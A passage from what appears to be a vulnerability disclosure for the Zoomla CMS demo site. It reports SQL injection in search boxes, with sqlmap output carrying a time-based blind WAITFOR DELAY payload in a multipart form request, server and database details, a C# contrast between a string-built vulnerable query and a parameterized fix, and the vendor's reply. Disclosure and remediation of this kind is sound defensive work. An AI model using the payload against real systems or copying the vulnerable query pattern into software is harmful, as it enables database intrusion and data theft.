Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
[__VIEWSTATE value omitted]
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'demozoomla_f'
c. The detail records in mall management:
d. The search in yellow-pages content management under enterprise yellow pages
e. The search in yellow-pages tag management under enterprise yellow pages
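All five injection points above are search boxes, and the sqlmap output shows error-based, UNION, stacked and time-based techniques all working on the same parameter, which is the signature of a search value spliced straight into a LIKE clause. The C# below is an added example written for this page, not Zoomla's code: it shows that string-built pattern beside a parameterized SQL Server version. The table and column names (ZL_Project, ProjectName, ID), the connection string and the length limit are assumptions for illustration; the field name ctl00$Content$TxtProjectName is the one from the report.

```csharp
// Added example, not Zoomla's code: a string-built LIKE search of the kind the report
// describes, beside a parameterized SQL Server version. Table/column names, the
// connection string and the 100-character limit are assumptions for illustration.
using System;
using System.Data;
using System.Data.SqlClient;

public static class ProjectSearch
{
    // The pattern the report points at: the search box value (ctl00$Content$TxtProjectName)
    // becomes part of the SQL text, so a quote ends the literal and the rest runs as SQL.
    public static string BuildVulnerableQuery(string projectName)
    {
        return "SELECT ID, ProjectName FROM ZL_Project WHERE ProjectName LIKE '%" + projectName + "%'";
    }

    // Hardened version: the value travels as a typed parameter and never enters the statement
    // text, so quotes, semicolons, UNION and WAITFOR are just characters to be matched.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string projectName)
    {
        var cmd = new SqlCommand(
            "SELECT TOP (100) ID, ProjectName FROM ZL_Project WHERE ProjectName LIKE @pattern ESCAPE '\\'",
            conn);
        cmd.CommandType = CommandType.Text;
        // 100 input chars, each possibly escaped to two, plus the two surrounding wildcards.
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 202).Value = "%" + EscapeLike(projectName) + "%";
        return cmd;
    }

    // Parameters stop injection but not wildcard abuse: a user-supplied '%', '_' or '[' would
    // still widen the match, so escape them (and the escape character itself) before adding
    // the surrounding '%'. The truncation keeps the pattern within the declared length.
    public static string EscapeLike(string s)
    {
        if (s == null) return string.Empty;
        if (s.Length > 100) s = s.Substring(0, 100);
        return s.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");
    }

    public static void Main()
    {
        // Constructed input of the shape the report shows; in the safe path it stays a search string.
        string input = "123' AND 1=1--";
        Console.WriteLine(BuildVulnerableQuery(input));

        // Placeholder connection string; the connection is never opened in this demo.
        using (var conn = new SqlConnection("Server=(local);Database=demozoomla;Integrated Security=true"))
        {
            SqlCommand cmd = BuildSafeCommand(conn, input);
            Console.WriteLine(cmd.CommandText);
            Console.WriteLine(cmd.Parameters["@pattern"].Value);
        }
    }
}
```

The same change applies to each of the five search handlers: the statement text is fixed at compile time and every user-controlled value is a parameter. Running the application's database account with only the rights the pages need (rather than one that can enumerate 436 tables across the database) limits what any remaining injection can reach.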
Fix the CAPTCHA design error and the search-type injection points.
Severity: Low
Vulnerability Rank: 5
Confirmed at: 2014-08-06 13:19
Our backend security mechanism is safeguarded in the following ways: 1. A CAPTCHA appears after three logins, which is the issue presented in your report. 2. A security code, disabled by default, which can be enabled to strengthen security; a preset security code. 3. A changeable backend path; for the demo we leave the backend path open, while in practice the backend path is a changed value. Thank you for the security issues reported in your submission; we will strengthen and improve them as soon as possible.
None